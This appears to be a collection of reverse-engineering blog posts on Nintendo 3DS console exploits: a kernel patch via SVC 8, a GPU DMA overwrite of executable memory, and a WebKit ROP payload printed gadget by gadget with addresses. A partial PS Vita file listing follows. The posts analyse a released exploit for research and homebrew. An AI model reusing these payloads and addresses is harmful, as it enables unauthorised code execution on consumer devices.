  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.

Vulnerability

The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only difference in the different payloads are memory offsets).

Details

This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
FS_MOUNTSDMC("dmc:");
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).

Future

The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.

Payload

For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
... START_DECODE_LOOP ...
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
... END OF ROP PAYLOAD ...
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 

PS Vita 3.30 Filesystem Listing

To start off, two main facts: 1) this is NOT a hack or anything and 2) this post is completely useless for most people. We have had this information for a long time now and it wasn’t too hard to obtain but we chose to not publicize it because unlike certain other people, we didn’t feel the need to brag about a listing of files with no other information just for the sake of showing off. However, now there’s reports of people obtaining the facility to dump files from the Vita file system. I do not know the details of this alleged method, but seeing how at least one person could benefit from this, there could be others working in secret. Anyways, please don’t make this news.

os0:psp2bootconfig.skprx
os0:psp2config_dolce.skprx
os0:psp2config_vita.skprx
os0:kd/acmgr.skprx
os0:kd/authmgr.skprx
os0:kd/bootimage.skprx
os0:kd/buserror.skprx
os0:kd/crashdump.skprx
os0:kd/dbgsdio.skprx
os0:kd/display.skprx
os0:kd/dmacmgr.skprx
os0:kd/enum_wakeup.skprx
os0:kd/error_table.bin
os0:kd/excpmgr.skprx
os0:kd/exfatfs.skprx
os0:kd/gcauthmgr.skprx
os0:kd/gpucoredump_es4.skprx
os0:kd/hdmi.skprx
os0:kd/intrmgr.skprx
os0:kd/iofilemgr.skprx
os0:kd/krm.skprx
os0:kd/lcd.skprx
os0:kd/lowio.skprx
os0:kd/magicgate.skprx
os0:kd/marlin_hci.skprx
os0:kd/mgkeymgr.skprx
os0:kd/mgvideo.skprx
os0:kd/modulemgr.skprx
os0:kd/msif.skprx
os0:kd/oled.skprx
os0:kd/pamgr.skprx
os0:kd/pcbc.skprx
os0:kd/processmgr.skprx
os0:kd/registry.db0
os0:kd/rtc.skprx
os0:kd/sdbgsdio.skprx
os0:kd/sdif.skprx
os0:kd/sdstor.skprx
os0:kd/sm_comm.skprx
os0:kd/smsc_proxy.skprx
os0:kd/ss_mgr.skprx
os0:kd/syscon.skprx
os0:kd/sysmem.skprx
os0:kd/sysstatemgr.skprx
os0:kd/systimer.skprx
os0:kd/threadmgr.skprx
os0:kd/usbdev_serial.skprx
os0:kd/usbpspcm.skprx
os0:kd/usbstor.skprx
os0:kd/usbstormg.skprx
os0:kd/usbstorvstor.skprx
os0:kd/vipimg.skprx
os0:kd/vnzimg.skprx
os0:kd/wlanbt_robin_img_ax.skprx
os0:sm/act_sm.self
os0:sm/aimgr_sm.self
os0:sm/compat_sm.self
os0:sm/encdec_w_portability_sm.self
os0:sm/gcauthmgr_sm.self
os0:sm/mgkm_sm.self
os0:sm/pm_sm.self
os0:sm/qaf_sm.self
os0:sm/rmauth_sm.self
os0:sm/spkg_verifier_sm_w_key_2.self
os0:sm/update_service_sm.self
os0:sm/utoken_sm.self
os0:ue/safemode.self
os0:us/avcodec_us.suprx
os0:us/driver_us.suprx
os0:us/libgpu_es4.suprx
os0:us/libgxm_es4.suprx
os0:us/libkernel.suprx
vs0:app/NPXS10000/eboot.bin
vs0:app/NPXS10000/near_plugin.rco
vs0:app/NPXS10000/near_plugin_animation.rco
vs0:app/NPXS10000/near_plugin_help_emo.rco
vs0:app/NPXS10000/near_plugin_help_flow.rco
vs0:app/NPXS10000/near_plugin_help_item.rco
vs0:app/NPXS10000/near_plugin_help_playlist.rco
vs0:app/NPXS10000/near_plugin_help_ranking.rco
vs0:app/NPXS10000/near_plugin_help_spot.rco
vs0:app/NPXS10000/near_plugin_help_status.rco
vs0:app/NPXS10000/near_plugin_help_title.rco
vs0:app/NPXS10000/near_plugin_livearea.rco
vs0:app/NPXS10000/near_plugin_new_event.rco
vs0:app/NPXS10000/near_plugin_setting.rco
vs0:app/NPXS10000/near_plugin_tuto_common.rco
vs0:app/NPXS10000/sce_sys/icon0.png
vs0:app/NPXS10000/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10000/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10000/sce_sys/livearea/contents/item01.png
vs0:app/NPXS10000/sce_sys/livearea/contents/item02.png
vs0:app/NPXS10000/sce_sys/livearea/contents/item03.png
vs0:app/NPXS10000/sce_sys/livearea/contents/item04.png
vs0:app/NPXS10000/sce_sys/livearea/contents/item_line.png
vs0:app/NPXS10000/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10000/sce_sys/param.sfo
vs0:app/NPXS10000/sce_sys/pic0.png
vs0:app/NPXS10001/eboot.bin
vs0:app/NPXS10001/np_party_app.suprx
vs0:app/NPXS10001/party_session_image.jpg
vs0:app/NPXS10001/sce_sys/PartyPlugin.rco
vs0:app/NPXS10001/sce_sys/icon0.png
vs0:app/NPXS10001/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10001/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10001/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10001/sce_sys/param.sfo
vs0:app/NPXS10001/sce_sys/pic0.png
vs0:app/NPXS10002/eboot.bin
vs0:app/NPXS10002/sce_sys/icon0.png
vs0:app/NPXS10002/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10002/sce_sys/livearea/contents/bg1.png
vs0:app/NPXS10002/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10002/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10002/sce_sys/param.sfo
vs0:app/NPXS10002/sce_sys/pic0.png
vs0:app/NPXS10002/store_browser_plugin.rco
vs0:app/NPXS10003/eboot.bin
vs0:app/NPXS10003/preset/Asia_B1_favicon.gim
vs0:app/NPXS10003/preset/EU_B1_favicon_32x32.gim
vs0:app/NPXS10003/preset/J1_B1_favicon_SCEJ.gim
vs0:app/NPXS10003/preset/J1_B2_favicon.gim
vs0:app/NPXS10003/preset/J1_B3_favicon.png
vs0:app/NPXS10003/preset/T-ball-32.gim
vs0:app/NPXS10003/preset/UC2_B1-Banner_8BitPNG.png
vs0:app/NPXS10003/preset/UC2_B1_Favicon_8BitPNG.gim
vs0:app/NPXS10003/sce_sys/icon0.png
vs0:app/NPXS10003/sce_sys/livearea/contents/Asia_B1_Banner.png
vs0:app/NPXS10003/sce_sys/livearea/contents/EU_B1_Banner.png
vs0:app/NPXS10003/sce_sys/livearea/contents/J1_B1_banner_SCEJ.png
vs0:app/NPXS10003/sce_sys/livearea/contents/J1_B2_282x108_02.png
vs0:app/NPXS10003/sce_sys/livearea/contents/LA_window.png
vs0:app/NPXS10003/sce_sys/livearea/contents/UC2_B1-Banner_24BitPNG.png
vs0:app/NPXS10003/sce_sys/livearea/contents/UC2_B1-Banner_8BitPNG.png
vs0:app/NPXS10003/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10003/sce_sys/livearea/contents/def_gate.gim
vs0:app/NPXS10003/sce_sys/livearea/contents/favicon.png
vs0:app/NPXS10003/sce_sys/livearea/contents/mydolce_banner2.png
vs0:app/NPXS10003/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10003/sce_sys/param.sfo
vs0:app/NPXS10003/sce_sys/pic0.png
vs0:app/NPXS10003/webbrowser_bookmark.db
vs0:app/NPXS10003/webbrowser_config.xml
vs0:app/NPXS10003/webbrowser_history.db
vs0:app/NPXS10003/webbrowser_plugin.rco
vs0:app/NPXS10003/webbrowser_preset.db
vs0:app/NPXS10003/webbrowser_preset_VITA_1.db
vs0:app/NPXS10003/webbrowser_preset_VITA_2.db
vs0:app/NPXS10003/webbrowser_preset_VTE_1.db
vs0:app/NPXS10004/eboot.bin
vs0:app/NPXS10004/photocam_plugin.rco
vs0:app/NPXS10004/sce_sys/icon0.png
vs0:app/NPXS10004/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10004/sce_sys/livearea/contents/camera.png
vs0:app/NPXS10004/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10004/sce_sys/livearea/contents/photo.png
vs0:app/NPXS10004/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10004/sce_sys/param.sfo
vs0:app/NPXS10004/sce_sys/pic0.png
vs0:app/NPXS10005/eboot.bin
vs0:app/NPXS10005/mapviewer.db
vs0:app/NPXS10005/mapviewer_plugin.rco
vs0:app/NPXS10005/sce_sys/icon0.png
vs0:app/NPXS10005/sce_sys/livearea/contents/LA_Text_BG.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/Map_Default_Gate.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/Map_LA_BG.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/Text_BG_car.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/Text_BG_human.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/route_history.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/search_history.gim
vs0:app/NPXS10005/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10005/sce_sys/param.sfo
vs0:app/NPXS10005/sce_sys/pic0.png
vs0:app/NPXS10006/eboot.bin
vs0:app/NPXS10006/friend_plugin.rco
vs0:app/NPXS10006/sce_sys/icon0.png
vs0:app/NPXS10006/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10006/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10006/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10006/sce_sys/param.sfo
vs0:app/NPXS10006/sce_sys/pic0.png
vs0:app/NPXS10008/eboot.bin
vs0:app/NPXS10008/sce_sys/icon0.png
vs0:app/NPXS10008/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10008/sce_sys/livearea/contents/default_gate.png
vs0:app/NPXS10008/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10008/sce_sys/param.sfo
vs0:app/NPXS10008/sce_sys/pic0.png
vs0:app/NPXS10008/trophy_local_plugin.rco
vs0:app/NPXS10008/trophy_network_plugin.rco
vs0:app/NPXS10008/trophy_plugin.rco
vs0:app/NPXS10009/eboot.bin
vs0:app/NPXS10009/musicbrowser_plugin.rco
vs0:app/NPXS10009/sce_sys/icon0.png
vs0:app/NPXS10009/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10009/sce_sys/livearea/contents/startup.png
vs0:app/NPXS10009/sce_sys/livearea/contents/template.xml
vs0:app/NPXS10009/sce_sys/param.sfo
vs0:app/NPXS10009/sce_sys/pic0.png
vs0:app/NPXS10010/eboot.bin
vs0:app/NPXS10010/sce_sys/icon0.png
vs0:app/NPXS10010/sce_sys/livearea/contents/VideoPlayer_Gate.png
vs0:app/NPXS10010/sce_sys/livearea/contents/bg0.png
vs0:app/NPXS10010/sce_sys/livearea/contents/template.xml
